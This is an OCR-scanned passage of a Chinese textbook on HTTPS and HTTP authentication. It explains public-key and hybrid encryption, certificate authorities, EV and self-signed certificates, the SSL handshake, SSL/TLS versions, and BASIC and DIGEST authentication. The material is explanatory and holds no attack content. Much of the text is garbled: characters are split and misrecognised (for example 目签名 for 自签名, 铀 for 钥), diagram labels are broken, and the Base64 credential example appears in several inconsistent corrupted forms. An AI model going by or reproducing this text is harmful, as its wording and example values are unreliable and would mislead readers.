7.2.3 ”相互 交换 密 钥 的 公开 器 钥 加 蜜 技术 

在 对 SSL 进行 讲解 之 前 ， 我们 先 来 了 解 一 下 加 密 方 法 。SSL 采用 一 
种 叫做 公开 密 钥 加 密 ( Public-key cryptography ) 的 加 密 处 理 方式 。 

近代 的 加 密 方 法 中 加 密 算法 是 公开 的 ， 而 密 钥 却 是 保密 的 。 通 过 这 
种 方式 得 以 保持 加 密 方 法 的 安全 性 。 

加 密 和 解密 都 会 用 到 密 钥 。 没 有 密 钥 就 无 法 对 密码 解密 ， 反 过 来 
说 ， 任 何人 只 要 持 有 密 钥 就 能 解密 了 。 如 果 密 钥 被 攻击 者 获得 ， 那 加 密 
也 就 失去 了 意义 。 


图 共享 密 钥 加 密 的 困境 
加 密 和 解密 同 用 一 个 密 钥 的 方式 称 为 共享 密 钥 加 密 ( Common key 
crypto system )， 也 被 叫做 对 称 密 钥 加 密 。 


第 7 章 葡 保 Web 安 全 的 HTTPS 


ee 一 mm 一 mm 一 一 一 一 mr -一 = EE 一 一 一 一 一 一 一 Es a 





加 密 解 密使 用 
相同 的 密 钥 


1 只 要 拿 到 密 铀 ， : 
< 任何 人 都 能 破解 ， 
密码 ee 





以 共享 密 钥 方式 加 密 时 必须 将 密 钥 也 发 给 对 方 。 可 究竟 怎样 才能 安 。 时 


全 地 转交 ? 在 互联 网 上 转发 密 钥 时 ， 如 果 通 信 被 监听 那么 密 钥 就 可 会 藻 
人 攻击 者 之 手 ， 同 时 也 就 失去 了 加 密 的 意义 。 另 外 还 RE 
接收 到 的 密 钥 。 


一 一 一 ER = en. 


怎样 才能 安全 地 发 送 密 钥 ? 


[ 发 送 密 钥 就 有 被 窃听 的 风险 , 但 不 发 送 , 对方 就 不 能 解密 。 再 说 , 密 








| 钥 若 能 够 安全 发 送 ， 那 数据 也 应 该 能 安全 送 达 。 


: 密 钥 发 送 问题 


图 使 用 两 把 密 钥 的 公开 密 钥 加 密 

公开 密 钥 加 密 方 式 很 好 地 解决 了 共享 密 钥 加 密 的 困难 。 

公开 密 钥 加 密使 用 一 对 非 对 称 的 密 钥 。 一 把 叫做 私有 密 钥 ( private 
key )， 另 一 把 叫做 公开 密 钥 ( public key )。 顾 名 思 义 ， 私 有 密 钥 不 能 让 
其 他 任何 人 知道 ， 而 公开 密 钥 则 可 以 随意 发 布 ， 任 何人 都 可 以 获得 。 

使 用 公开 密 钥 加 密 方式 ， 发 送 密 文 的 一 方 使 用 对 方 的 公开 密 钥 进行 
加 密 处 理 ， 对 方 收 到 被 加 密 的 信息 后 ， 再 使 用 自己 的 私有 密 钥 进行 解 
密 。 利 用 这 种 方式 ， 不 需要 发 送 用 来 解密 的 私有 密 钥 ， 也 不 必 担 心 密 铀 
被 攻击 者 独 听 而 盗 走 。 

另外 ， 要 想 根据 密 文 和 公开 密 钥 ， 恢 复 到 信息 原文 是 异常 困难 的 ， 
因为 解密 过 程 就 是 在 对 离散 对 数 进行 求 值 ， 这 并 非 轻 而 昂 举 束 能 办 到 。 
退 一 步 讲 ， 如 果 能 对 一 个 非常 大 的 整数 做 到 快速 地 因 式 分 解 ， 那 么 密码 
破解 还 是 存在 希望 的 。 但 就 目前 的 技术 来 看 是 不 太 现 实 的 。 


公开 密 钥 可 ce 
2 全 开间 





私有 密 钥 


公开 密 钥 和 私有 密 钥 
是 配对 的 一 套 密 钥 





公开 密 钥 


使 用 公开 密 钥 
进行 加 密 
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图 HTTPS 采 用 混合 加 密 机 制 
HTTPS 采用 共享 密 钥 加 密 和 公开 密 钥 加 密 两 者 并 用 的 混合 加 密 机 
制 。 若 密 钥 能 够 实现 安全 交换 ， 那 么 有 可 能 会 考虑 仅 使 用 公开 密 钥 加 窗 
来 通信 。 但 是 公开 密 钥 加 密 与 共享 密 钥 加 密 相 比 ， 其 处 理 速度 要 慢 。 
所 以 应 充分 利用 两 者 各 自 的 优势 ， 将 多 种 方法 组 合 起 来 用 于 通信 。 
在 交换 密 钥 环节 使 用 公开 密 钥 加 密 方式 ， 之 后 的 建立 通信 交换 报 文 阶段 
则 使 用 共 圣 密 钥 加 密 方 式 。 






中 使 用 公开 密 钥 加 密 方 式 安全 地 交换 在 稍 后 的 共享 密 钥 加 密 中 要 使 用 的 密 钥 
如 





共享 密 钥 加 密 和 


S 共享 密 钥 加 密 
共享 密 钥 加 密 : 
共享 密 钥 加 密 。 





图 : 混合 加 密 机 制 


7.2.4 证 明 公 开 密 钥 正 确 性 的 证 书 
遗憾 的 是 ， 公 开 密 钥 加 密 方式 还 是 存在 一 些 问 题 的 。 那 就 是 无 法 证 
明 公 开 密 钥 本 身 就 是 货真价实 的 公开 密 钥 。 比 如 ， 正 准备 和 某 台 服务 器 





oy Pr 
i 





建立 公开 密 钥 加 密 方式 下 的 通信 时 ， 如 何 证 明 收 到 的 公开 和 密 钥 就 是 原本 
预想 的 那 台 服 务 器 发 行 的 公开 密 钥 。 或 许 在 公开 密 钥 传输 途中 ， 真 正 的 
公开 密 钥 已 经 被 攻击 者 奉 换 掉 了 。 

为 了 解决 上 述 问 题 ， 可 以 使 用 由 数字 证 书 认证 机 构 ( CA，Certificate 
Authority ) 和 其 相关 机 关 颁 发 的 公开 密 钥 证 书 。 

数字 证 书 认证 机 构 处 于 客户 端 与 服务 器 双方 都 可 信赖 的 第 三 方 机 构 
的 立场 上 。 威 珊 信 ( VeriSign ) 就 是 其 中 一 家 非常 有 名 的 数字 证 书 认 证 
机 构 。 我 们 来 介绍 一 下 数字 证 书 认证 机 构 的 业务 流程 。 首 先 ， 服务器 的 
运营 人 员 回 数字 证 书 认证 机 构 提 出 公开 密 钥 的 申请 。 数 字 证 书 认 证 机 构 
在 判明 提出 申请 者 的 身份 之 后 ， 会 对 已 申请 的 公开 密 钥 做 数字 签名 ， 然 
后 分 配 这 个 已 签名 的 公开 密 钥 ， 并 将 该 公开 密 钥 放 人 公 钥 证 书后 绑 定 在 
一 起 。 

服务 顺 会 将 这 份 由 数字 证 书 认 证 机 构 颁 发 的 公 钥 证 书 发 送 给 客户 
端 ， 以 进行 公开 密 钥 加 密 方式 通信 。 公 钥 证 书 也 可 叫做 数字 证 书 或 直接 
称 为 证 书 。 

接 到 证 书 的 客户 端 可 使 用 数字 证 书 认证 机 构 的 公开 密 钥 ， 对 那 张 证 
书 上 的 数字 签名 进行 验证 ， 一 旦 验证 通过 ， 客 户 端 便 可 明确 两 件 事 ; 
一 ， 认 证 服务 器 的 公开 密 钥 的 是 真实 有 效 的 数字 证 书 认证 机 构 。 二 ， 服 
务 器 的 公开 密 钥 是 值得 信赖 的 。 

此 处 认证 机 关 的 公开 密 钥 必 须 安 全 地 转交 给 客户 端 。 使 用 通信 方式 
时 ， 如 何 安全 转交 是 一 件 很 困难 的 事 ， 因 此 ， 多 数 浏览 器 开发 丙 发 布 版 
本 时 ， 会 事先 在 内 部 植 入 常用 认证 机 关 的 公开 密 钥 。 


曲 ， 学 bd 确保 Web 安 全 的 bldg 


一 一 -一 Ra aa er i 


L 数字 证 书 认证 机 构 的 私有 密 钥 





2 数字 证 书 认证 机 构 用 自己 的 私有 密 钥 向 服务 
器 的 公开 密码 署 数字 签名 并 颁发 公 钥 证 书 





数字 证 书 认 证 机 构 
玉 让 生 下 李 汪 术科 钢 汪 村 


植 入 到 浏览 器 里 了 


3 客户 端 拿 到 服务 器 的 公 
书 认证 机 构 的 公开 密 Ts 人 
钥 , 向 数字 证 书 认 证 机 服务 器 的 全 下 再 








中 服务 器 把 自己 的 公开 密 钥 
”登录 至 数字 证 书 认证 机 构 







构 验 证 公 钥 证 书 上 的 数 公开 密 钥 
字 签 名 ， 以 确认 服务 器 - 
的 公开 密 钥 的 真实 性 数字 证 书 认证 


上 EW 机构 的 数字 签名 





和 服务 器 的 
(< 一 一 一 和 私有 密 针 





ep [加 服务 器 用 私 
四 使 用 服务 器 的 公开 密 钥 对 报 | 有 密 铀 对 报 
文 加 密 后 发 送 服务 器 文 解密 


Fe Timestanpin. , 
| 国 wm - DATACorp SGC 
| 加 wsawirsteaject 
| | | | 国 wmrusenrirst-oelect 


| EGS) Verisign Class 3 Pp,. 
tw Class 3 P,. 


证 韦 的 预期 目的 
代码 管 名 ， 胜 务 器 身份 验证 ， 


了 解 证 书 的 详细 信息 
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国 可 证 明 组 织 真 实 性 的 EV SSL 证书 

证 书 的 一 个 作用 是 用 来 证 明 作 为 通信 一 方 的 服务 器 是 否 规范 ， 另 外 
一 个 作用 是 可 确认 对 方 服务 器 背后 运营 的 企业 是 否 真实 存在 。 拥 有 该 特 
性 的 证 书 就 是 EV SSL 证 书 ( Extended Validation SSL Certificate )。 

EV SSL 证 书 是 基于 国际 标准 的 认证 指导 方针 颁发 的 证 书 。 其 严格 
规定 了 对 运营 组 织 是 否 真 实 的 确认 方针 ， 因 此 ， 通 过 认证 的 Web 网 站 
能 够 获得 更 高 的 认可 度 。 

持 有 EV SSL 证 书 的 Web 网 站 的 浏览 器 地 址 栏 处 的 背景 色 是 绿色 
的 ， 从 视觉 上 就 能 一 眼 辨 别 出 。 而 且 在 地 址 栏 的 左 侧 显示 了 SSL 证 书 
中 记录 的 组 织 名 称 以 及 颁发 证 书 的 认证 机 构 的 名 称 。 






上 述 机 制 的 原意 图 是 为 了 防止 用 户 被 钓鱼 攻击 ( Phishing )， 但 就 效 
果 上 来 讲 ， 还 得 打 一 个 问号 。 很 多 用 户 可 能 不 了 解 EV SSL 证 书 相 关 的 
知识 ， 因 此 也 不 太 会 留意 它 。 


国 用 以 确认 客 己 端的 客 尸 端 证 书 

HTTPS 中 还 可 以 使 用 客户 端 证 书 。 以 客户 闪 证 书 进行 客户 端 认 证 ， 
证 明 服 务 句 正在 通信 的 对 方 始终 是 预料 之 内 的 客户 端 ， 其 作用 跟 服务 名 
证 书 如 出 一 梧 。 

但 客户 端 证 书 仍 存在 几 处 问题 点 。 其 中 的 一 个 问题 点 是 证 书 的 获取 
及 发 布 。 

想 获 取证 书 时 ， 用 户 得 目 行 安 沪 客户 问 证 书 。 但 由 于 客 尸 问 证 书 是 
要 付费 购买 的 ， 且 每 张 证 书 对 应 到 每 位 用 户 也 就 意味 着 需 支 付 和 用 户 数 
对 等 的 费用 。 另 外 ， 要 让 知识 层次 不 同 的 用 户 们 上 自行 安装 证 书 ， 这 件 事 
本 身 也 充满 了 各 种 挑战 。 

现状 是 ， 安 全 性 极 高 的 认证 机 构 可 颁发 客户 端 证 书 但 仅 用 于 特殊 用 
途 的 业务 。 比 如 那些 可 支撑 客户 病 证 书 文 出 费用 的 业务 。 
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例如 ， 银 行 的 网 上 银行 就 采用 了 客户 端 证 书 。 在 登录 网 银 时 不 仅 要 
求 用 户 确认 输入 ID 和 密码 ， 还 会 要 求 用 户 的 客户 痕 证 书 ， 以 确认 用 户 
是 否 从 特定 的 终端 访问 网 银 。 

客户 端 证 书 存在 的 另 一 个 问题 点 是 ， 客 户 端 证 书 毕 葛 只 能 用 来 证 明 
客户 端 实际 存在 ， 而 不 能 用 来 证 明 用 户 本 人 的 真实 有 效 性 。 也 就 是 说 ， 
只 要 获得 了 安 交 有 客户 端 证 书 的 计算 机 的 使 用 权限 ， 也 就 意味 痢 同 时 拥 
有 了 客户 闯 证 书 的 使 用 权限 。 


国 认 证 机 构 信 答 蕴 一 

SSL 机 制 中 介入 认证 机 构 之 所 以 可 行 ， 是 因为 建立 在 其 信用 绝对 可 
靠 这 一 大 前 提 下 的 。 然 而 ，2011 年 7 月 ， 荷 兰 的 一 家 名 叫 DigiNotar 的 
认证 机 构 曾 遭 黑客 不 法 和 人 侵 ， 颁 布 了 google.com 和 twittercom 等 网 站 
的 伪造 证 书 事件 。 这 一 事件 从 根本 上 撼动 了 SSL 的 可 信和 度 。 

因为 伪造 证 书 上 有 正规 认证 机 构 的 数字 签名 ， 所 以 浏览 器 会 判定 该 
证 书 是 正当 的 。 当 伪造 的 证 书 被 用 做 服务 器 伪装 之 时 ， 用 户 根本 无 法 察 
觉 到 。 

虽然 存在 可 将 证 书 无 效 化 的 证 书 钙 销 列表 ( Certificate Revocation 
List，CRL ) 机 制 ， 以 及 从 客户 端 删 除根 证 书 颁 发 机 构 〈 Root Certificate 
Authority，RCA ) 的 对 策 ， 但 是 距离 生效 还 需要 一 段 时 间 ， 而 在 这 段 时 
间 内 ， 到 底 会 有 多 少 用 户 的 利益 蒙受 损失 就 不 得 而 知 了 。 


图 由 自 认 证 机 构 颁 发 的 证 书 称 为 目 签名 证 书 

如 果 使 用 OpenSSL 这 套 开 源 程序 ， 每 个 人 都 可 以 构建 一 套 属 于 目 
己 的 认证 机 构 ， 从 而 自己 给 自己 颁发 服务 器 证 书 。 但 该 服务 器 证 书 在 互 
联网 上 不 可 作为 证 书 人 使用， 似乎 没什么 帮助 。 

独立 构建 的 认证 机 构 叫 做 目 认证 机 构 ， 由 目 认 证 机 构 颁 发 的 “无 
用 ”证 书 也 被 戏称 为 目 签名 证 书 。 

浏览 器 访问 该 服务 器 时 ， 会 显示 “无 法 确认 连接 安全 性 ”或 “该 网 


站 的 安全 证 书 存在 问题 ”等 警告 消息 。 


该 安全 证 书 由 你 没有 先 定 信任 的 公司 颁发 。 可 以 查看 证 书 
以 便 确定 体 是 否 信任 该 验证 机 构 . 


设 安全 证 书 的 日 期 有 效 。 


全 家 全 访 各 和 机 天生 吉村 环 夺 更 汐 有关 


是 否 继续 ? 


查看 证书 M 





由 目 认 证 机 构 舌 发 的 服务 从 证 书 之 所 以 不 起 作用 ， 是 因为 它 无 法 消 
除 伪 讼 的 可 能 性 。 目 认证 机 构 能 够 广 生 的 作用 项 多 也 就 是 目 己 对 外 宣称 
“我 是 OO” 的 这 种 程度 。 即 使 采用 目 签名 证 书 ， 通 过 SSL 加 密 之 后 ， 
可 能 偶尔 还 会 看 见 通 信人 处 在 安全 状态 的 提示 ， 可 那 也 是 有 问题 的 。 因 为 
就 算 加 密 通 信 ， 也 不 能 排除 正在 和 已 经 过 伪装 的 假 服务 器 保持 通信 。 

值得 信赖 的 第 三 方 机 构 介 入 认证 ， 才 能 让 已 植 入 在 浏览 带 内 的 认证 
机 构 颁 布 的 公开 密 钥 发 挥 作用 ， 并 仿 此 证 明 服 务 顺 的 真实 性 。 


中 级 认证 机 构 的 证 书 可 能 会 变 成 自 认 证 证 书 

多 数 浏览 器 内 预先 已 植 和 人 备 受 信赖 的 认证 机 构 的 证 书 ,但 也 有 一 小 
部 分 浏览 毅 会 植 信 中 级 认证 机 构 的 证 书 。 

对 于 中 级 认证 机 构 颁 发 的 服务 利 证 书 ， 某 些 浏 览 硕 会 以 正规 的 证 书 
来 对 待 ， 可 有 的 浏览 硕 会 当 作 目 签 名 证 书 。 
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ee HTTPS 的 安全 通信 机 制 
了 而 大 z 
『 更 好 地 理解 HTTPS ， 我 们 来 观察 一 下 HTTPS 的 通信 步骤 
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图 : HTTPS 通信 
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- 最 = 时 
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步骤 1: 


步骤 2: 


步骤 3: 


步骤 4: 


步骤 5: 


步骤 6: 


步骤 7: 


步骤 8: 
步骤 9: 
步骤 10: 


步骤 11: 
步骤 12: 


客户 端 通过 发 送 Client Hello 报 文 开始 SSL 通信 。 报 文中 
包含 客户 端 支持 的 SSL 的 指定 版 本 、 加 密 组 件 (Cipher 
Suite ) 列表 (所 使 用 的 加 密 算法 及 密 钥 长 度 等 )。 
服务 器 可 进行 SSL 通信 时 ， 会 以 Server Hello 报 文 作为 应 
答 。 和 客户 端 一 样 ， 在 报 文中 包含 SSL 版 本 以 及 加 密 组 
件 。 服 务 器 的 加 密 组 件 内 容 是 从 接收 到 的 客户 病 加 密 组 件 
内 吧 选 出 来 的 。 

之 后 服务 器 发 送 Certificate 报 文 。 报 文中 包含 公开 密 针 
证 书 。 

最 后 服务 器 发 送 Server Hello Done 报 文 通知 客户 端 ， 最 初 
阶段 的 SSL 握手 协商 部 分 结束 。 

SSL 第 一 次 握手 结束 之 后 ， 客 户 问 以 Client Key Exchange 
报 文 作为 回应 。 报 文中 包含 通信 加 密 中 使 用 的 一 种 被 称 为 
Pre-master secret 的 随机 密码 串 。 该 报 文 已 用 步骤 3 中 的 公 
开 密 钥 进 行 加 密 。 

接着 客户 端 继续 发 送 Change Cipher Spec 报 文 。 该 报 文 会 
提示 服务 硕 ， 在 此 报 文 之 后 的 通信 会 采用 Pre-master secret 
密 钥 加 密 。 

客户 端 发 送 Finished 报 文 。 该 报 文 包 含 连接 至 今 全 部 报 文 
的 整体 校 验 值 。 这 次 握手 协商 是 否 能 够 成 功 ， 要 以 服务 需 
是 否 能 够 正确 解密 该 报 文 作为 判定 标准 。 

服务 器 同样 发 送 Change Cipher Spec 报 文 。 
服务 器 同样 发 送 Finished 报 文 。 

服务 器 和 客户 端的 Finished 报 文 交换 完毕 之 后 ，SSL 连接 
就 算 建 立 完成 。 当 然 ， 通 信 会 受到 SSL 的 你 护 。 从 此 人 处 开 
始 进 行 应 用 层 协议 的 通信 ， 即 发 送 HTTP 请 求 。 

应 用 层 协议 通信 ， 即 发 送 HTTP 响应 。 

最 后 由 客户 端 断 开 连 接 。 断 开 连 接 时 ， 发 送 close_notify 


一 -一 一 一 om 
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i ee 





报 文 。 上 图 做 了 一 些 省 略 ， 这 步 之 后 再 发 送 TCP FIN 报 文 来 关闭 与 TCP 
的 通信 。 


在 以 上 流程 中 ， 应 用 层 发 送 数据 时 会 附加 一 种 叫做 MAC ( Message 
Authentication Code ) 的 报 文摘 要 。MAC 能 够 查 知 报 文 是 否 遭 到 算 改 ， 
从 而 保护 报 文 的 完整 性 。 

下 面 征 对 整个 流程 的 图 解 。 图 中 说 明了 从 仅 使 用 服务 器 端的 公开 密 
钥 证 书 〈 服务 器 证 书 ) 建立 HTTPS 通信 的 整个 过 程 。 










eb 
报 文 校 验 码 的 密 钥 
生成 CBC 模式 7 的 初始 向 量 


公开 密 角 证书 
【 服务 器 证 书 ) 


。 共 享 密 钥 加 密 的 密 铀 
。 报 文 校 验 码 的 密 铀 
。 生 成 CBC 的 初始 向 量 ， 
服务 器 一 用 于 客户 端 ， 
以 及 客户 端 一 用 于 服务 
器 的 6 份 信息 

















使 用 服务 器 上 的 公开 





i 密 钥 对 pre-master 共享 密 钥 加 密 的 密 角 
| | es Sid | 报 文 校 验 码 的 密 钥 
se 本 生成 CBC 模 式 的 初始 向 大 
[emue a Secret ， [Coe 
pre-Master | 下 全 | 
ec 





公开 密 铀 (随机 数 ) 


国 SSL 各 TLS 
HTTPS 使 用 SSL ( Secure Socket Layer) 和 TLS ( Transport Layer 
Security ) 这 两 个 协议 。 


中 CBC 模 式 (Cipher Block Chaining ) 又 名 密码 分 组 链接 模式 。 在 此 模式 下 , 将 
前 一 个 明文 块 加 密 处 理 后 和 下 一 个 明文 块 做 XOR 运 算 , 使 之 重 登 , 然后 再 对 
运算 结果 做 加 密 处 理 。 对 第 一 个 明文 块 做 加 密 时 ,要 么 使 用 前 一 段 帘 文 的 最 
后 一 块 ， 要 么 利用 外 部 生成 的 初始 向 量 ( initial vector，IV ), 一 一 译 者 注 


Rss 
SSL 技术 最 初 是 由 浏览 右 开 发 商 网 景 通信 公司 率先 倡导 的 ， 开 发 过 
SSL3.0 之 前 的 版 本 。 目 前 主导 权 已 转移 到 IETF ( Intermet Engineering 
Task Force，Intemet 工程 任务 组 ) 的 手中 。 
IETF 以 SSL3.0 为 基准 ， 后 又 制定 了 TLS1.0、TLS1.1 和 TLS1.2。 
TSL 是 以 SSL 为 原型 开发 的 协议 ， 有 时 会 统一 称 该 协议 为 SSL。 当 前 
主流 的 版 本 是 SSL3.0 和 TLS1.0。 
由 于 SSL1.0 协议 在 设计 之 初 被 发 现 出 了 问题 ， 就 没有 实际 投入 
使 用 。SSL2.0 也 被 发 现存 在 问题 ， 所 以 很 多 浏览 器 直接 废除 了 该 协 
议 版 本 。 


图 SSL 速度 慢 吧 
HTTPS 也 存在 一 些 问题 ， 那 就 是 当 使 用 SSL 时 ， 它 的 处 理 速度 会 
变 慢 。 


由 于 HTTPS 还 需要 做 服务 器 、 客 户 端 双方 加 密 及 
”解密 处 理 ， 因 此 会 消耗 CPU 和 内 存 等 硬件 资源 





和 HTTP 通 信和 相 比 ， SSL 通信 和 部 分 消耗 网 络 资 源 。 
而 SSL 通 信 部 分 , 又 因为 要 对 通信 进行 处 理 ， 所 






以 时 间 上 又 延长 了 


图 : HTTPS 比 HTTP 要 慢 2 到 100 售 


SSL 的 慢 分 两 种 。 一 种 是 指 通 信 慢 。 田 一 种 是 指 由 于 大 量 消 耗 CPU 
及 内 存 等 资源 ， 导 致 处 理 速度 变 慢 . 

和 使 用 HTTP 相 比 ， 网 络 负 和 载 可 能 会 变 慢 2 到 100 倍 。 除 去 和 TCP 
连接 、 发 送 HTTP 请 求 。 响 应 以 外 ， 还 必须 进行 SSL 通信 ， 因 此 整体 上 
处 理 通信 量 不 可 避免 会 增加 。 
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另 一 点 是 SSL 必须 进行 加 密 处 理 。 在 服务 器 和 客户 端 都 需要 进行 
加 密 和 解密 的 运算 处 理 。 因 此 从 结果 上 讲 ， 比 起 HTTP 会 更 多 地 消耗 服 
务 器 和 客户 端的 硬件 资源 ， 导 致 负 和 载 增强 ，。 

针对 速度 变 慢 这 一 问题 ， 并 没有 根本 性 的 解决 方案 ， 我 们 会 使 用 
SSL 加 速 背 这 种 ( 专用 服务 器 ) 硬件 来 改善 该 问题 。 该 硬件 为 SSL 通信 
专用 人 硬件， 相对 软件 来 讲 ， 能 够 提高 数 倍 SSL 的 计算 速度 。 仅 在 SSL 
处 理 时 发 挥 SSL 加 速 器 的 功效 ， 以 分 担负 载 。 


为 什么 不 一 直 使 用 HTTPS 

既然 HTTPS 那么 安全 可 靠 ， 那 为 何 所 有 的 Web 网 站 不 一 直 使 用 
HTIPS? 

其 中 一 个 原因 是 ， 因 为 与 纯 文本 通信 相 比 ， 加 密 通信 会 消耗 更 多 的 
CPU 及 内 存 资源 。 如 果 每 次 通信 都 加 密 ， 会 消耗 相当 多 的 资源 ， 平 摊 到 一 
台 计 算 机 上 时 ， 能 够 处 理 的 请 求 数量 必定 也 会 随 之 减少 。 

因此 ， 如 果 是 非 敏感 信息 则 使 用 HTTP 通信 ， 只 有 在 包含 个 人 信息 等 敏 
感 数据 时 ， 才 利用 HTTPS 加 密 通 信 。 

特别 是 每 当 那 些 访问 量 较 多 的 Web 网 站 在 进行 加 密 处 理 时 ， 它 们 所 承 
担 着 的 负载 不 容 小 虎 。 在 进行 加 密 处 理 时 ， 并 非 对 所 有 内 容 都 进行 加 密 处 理 ， 
而 是 仅 在 那些 需要 信息 隐藏 时 才 会 加 密 ， 以 节约 资源 。 







1f797c04ed91297d9dd 
9d7 1bp09b66a1f... 


加 宏和 婴 室 的 运 寅 
太 时 人 了 ~ 








服务 器 


除 此 之 外 ， 想 要 节约 购买 证 书 的 开销 也 是 原因 之 一 。 
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第 8 章 
确认 访 癌 用户 身份 的 认证 
某 些 Web 页 面 只 想 让 特定 的 人 浏览 ， 或 者 干脆 仅 本 人 可 见 。 为 达 


到 这 个 目标 , 必 不 可 少 的 就 是 认证 功能 。 下 面 我 们 一 起 来 学 习 一 下 
认证 机 制 。 











8.1 何 为 认证 


计算 机 本 吴 无 法 判断 坐 在 显示 吉 前 的 使 用 者 的 身份 。 进 一 步 说 ,也 
无 法 确认 网 络 的 那 头 究竟 有 谁 。 可 见 ， 为 了 和 弄 清 究竟 是 谁 在 访问 服务 
器 ， 就 得 让 对 方 的 客户 端 自 报 家 门 。 

可 是 ， 就 算 正在 访问 服务 器 的 对 方 声称 自己 是 ueno， 喘 份 是 否 属实 
这 点 却 也 无 从 谈 起 。 为 确认 ueno 本 人 是 否 真 的 具有 访问 系统 的 权限 ， 
就 需要 核对 “登录 者 本 人 才 知 道 的 信息 ”、“ 登 录 者 本 人 才 会 有 的 信息 ”。 

核对 的 信息 通常 是 指 以 下 这 些 。 


9 密码 : 只 有 本 人 才 会 知道 的 字符 串 信息 。 

9 动态 令 牌 : 仅 限 本 人 持 有 的 设备 内 显示 的 一 次 性 密码 . 
9 数字 证 书 : 仅 限 本 人 |( 终端) 持 有 的 信息 ， 

9 生物 认证 : 指纹 和 虹膜 等 本 人 的 生理 信息 。 

8 IC 卡 等 : 仅 限 本 人 持 有 的 信息 。 












我 是 上 野 。 我 曲 定 码 星 
XXXXX 关 。 仰 瞧 ， 我 虽 
道 密码 ， 可 以 确认 我 旺 
本 人 了 吧 ? 





但 是 ， 即 便 对 方 是 假冒 的 用 户 ， 只 要 能 通过 用 户 验 证 ， 那 么 计算 机 
就 会 默认 是 出 自 本 人 的 行为 。 因 此 ， 掌 控 机 密 信 息 的 密码 绝 不 能 让 他 人 
得 到 ， 更 不 能 屏 匈 地 就 被 破解 出 来 。 
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HTTP 使 用 的 认证 方式 
HTTP/1.1 使 用 的 认证 方式 如 下 所 示 。 


eBASIC 认证 ( 基本 认证 ) 

es DIGEST 认证 ( 摘要 认证 ) 

e SSL 客户 端 认证 

e FormBase 认证 ( 基于 表单 认证 ) 


此 外 ， 还 有 Windows 统一 认证 (Keberos 认证 、NTLM 认证 )， 但 
本 书 不 作 讲 解 。 


8.2 BASIC 认证 


BASIC 认证 (基本 认证 ) 是 从 HTTP/1.0 就 定义 的 认证 方式 。 即 便 
是 现在 仍 有 一 部 分 的 网 站 会 使 用 这 种 认证 方式 。 是 Web 服务 器 与 通信 
客户 端 之 间 进 行 的 认证 方式 。 


BASIC 认证 的 认证 步骤 


发 庆 请 来 四 
四 ) | GET /private/ HTTP/1.1 
日 Host: hackr.jp 


四 返回 状态 码 401 以 告知 客户 端 需要 进行 认证 


HTTP/1.1401 Authorization Required 
Date: Mon, 19 Sep 2011 08:38:32 GMT 
server Apache/2.2.3 (Un 服务 如 
WWW-Authenticate: Basic realm= Input Your ID and Password" 


2 用 户 ID 和 密码 以 Base64 方 式 编码 后 发 送 
guestguest 一 Base64 一 Z3VIc306Z3VIc3Q= 


GET /privata/ HTTP/.1 
Host: hackr.jp 
Authonzation: Basic Z3VIcdIQBZ3VIcdQ= 


3 认证 成 功 者 返回 状态 码 200, 若 认证 失败 则 返回 状态 码 401 


HTTP/1 .1 200 OK 
Date: Mon, 19 Sep 2011 08:38:35 GMT 

















SErver Apache/2.2.3 (Un 


: BASIC 认证 概要 





步骤 2: 


步骤 3: 





当 请 求 的 资源 需要 BASIC 认证 时 ， 服 务 器 会 随 状 态 码 401 
Authorization Required， 返 回 市 WWW-Authenticate 盲 部 
字段 的 响应 。 该 字段 内 包含 认证 的 方式 (BASIC) 及 
Request-URI 安全 域 字符 串 ( realm )。 

接收 到 状态 码 401 的 客户 端 为 了 通过 BASIC 认证 , 需要 
将 用 户 ID 及 密码 发 送 给 服务 器 。 发 送 的 字符 串 内 容 是 由 
用 户 ID 和 密码 构成 ， 两 者 中 间 以 冒号 (:) 连接 后 ， 再 经 
过 Base64 编码 处 理 。 

假设 用 户 ID 为 guest， 密 码 是 guest， 连 接 起 来 就 会 形成 
guest:guest 这 梓 的 字符 串 。 然 后 经 过 Base64 编码 ， 最 后 的 
结果 即 是 Z3Vlc3Q6Z3Vlc3Q=。 把 这 串 字符 串 写 人 首部 字 
段 Authorization 后 ， 发 送 请 求 。 

当 用 户 代 理 为 浏览 器 时 ， 用 户 仅 需 输入 用 户 ID 和 密码 
即 可 ， 之 后 ,浏览 器 会 自动 完成 到 Base64 编码 的 转换 





接收 到 包含 首部 字段 Authorization 请 求 的 服务 器 ， 会 对 认 
证 信息 的 正确 性 进行 验证 。 如 验证 通过 ， 则 返回 一 条 包含 
Request-URI 资源 的 啊 应 。 


BASIC 认证 虽然 采用 Base64 编码 方式 ， 但 这 不 是 加 密 处 理 。 不 需 


要 任何 附加 信息 即 可 对 其 解码 。 换 言 之 ， 由 于 明文 解码 后 就 是 用 户 ID 
和 和 密码， 在 HTTP 等 非 加 密 通 信 的 线路 上 进行 BASIC 认证 的 过 程 中 ， 
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如 果 被 人 窃听 ， 被 盗 的 可 能 性 极 高 。 

另外 ， 除 此 之 外 想 再 进行 一 次 BASIC 认证 时 ， 一 般 的 浏览 器 却 无 
法 实现 认证 注销 操作 ， 这 也 是 问题 之 一 - 

BASIC 认证 使 用 上 不 够 便捷 灵活 ， 且 达 不 到 多 数 Web 网 站 期 望 的 
安全 性 等 级 ， 因 此 它 并 不 常用 。 


8.3 DIGEST 认证 


为 弥补 BASIC 认证 存在 的 弱点 ， 从 HTTP/1.1 起 就 有 了 DIGEST 认 
证 。 DIGEST 认证 同样 使 用 质询 / 响应 的 方式 ( challenge/response )， 但 
不 会 像 BASIC 认证 那样 直接 发 送 明 文 密码 。 
所 谓 质 询 响应 方式 是 指 ， 一 开始 一 方 会 先 发 送 认证 要 求 给 为 一 方 ， 
接着 使 用 从 另 一 方 那 接 收 到 的 质询 码 计 算 生 成 啊 应 码 。 最 后 将 啊 应 码 返 
回 给 对 方 进行 认证 的 方式 。 171 





因为 发 送 给 对 方 的 只 是 啊 应 摘要 及 由 质询 码 产 生 的 计算 结果 ， 所 以 
比 起 BASIC 认证 ， 密 码 泄露 的 可 能 性 就 降低 了 。 


DIGEST 认证 的 认证 步骤 





(二 六 GET /digest HTTP/T 1 
Bl Host: hackrjp 
客户 端 1 发 送 临 时 的 质询 码 ( 随机 数 , nonce ) 以 及 告知 需要 认证 的 
状态 码 401 


HTTR/1.1 401 Authorization Required 





| WWW-Authenticate: Digest realm="DIGEST", 
nonce="MOSOQZOIBAA=44abb6784cc9cbfc605a5b0893d36f23de 服务 器 
95fcff", algorithm=MDS, qop="auth" 


2 发 送 摘要 以 及 由 质询 码 计算 出 的 响应 码 ( response | 
| GET /digest/ HTTP/1.1 
Host: hackr.jp 
Authorization: Digest usemame="guest", realm="DIGEST". 
